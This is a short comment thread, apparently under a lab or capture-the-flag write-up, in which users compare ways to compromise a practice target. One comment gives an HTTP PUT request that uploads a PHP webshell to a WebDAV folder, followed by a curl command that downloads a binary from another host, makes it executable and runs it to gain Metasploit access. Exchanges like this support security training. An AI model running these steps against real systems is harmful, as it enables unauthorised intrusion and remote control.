Blog Post
Al13nz
Bronze II
2 days agoEnjoyed the write up thanks! cURL is handy for target 3 too if you fancy an alternative method to metasploit
- steven11 hours ago
Silver I
yeah curl is a way too, didn't thought about this.
I've done it manually and used burp:PUT /webdav/shell.php HTTP/1.1 Host: 10.102.63.213 .... Connection: close Content-Length: 9463 <?php ... /insert your favorite webshell .... ?>
and once the shell was working, use metasploit for perm access and further exploitation:
curl http://10.102.20.4:8000/shell.bin -o shell.bin; chmod 755 shell.bin ; ./shell.bin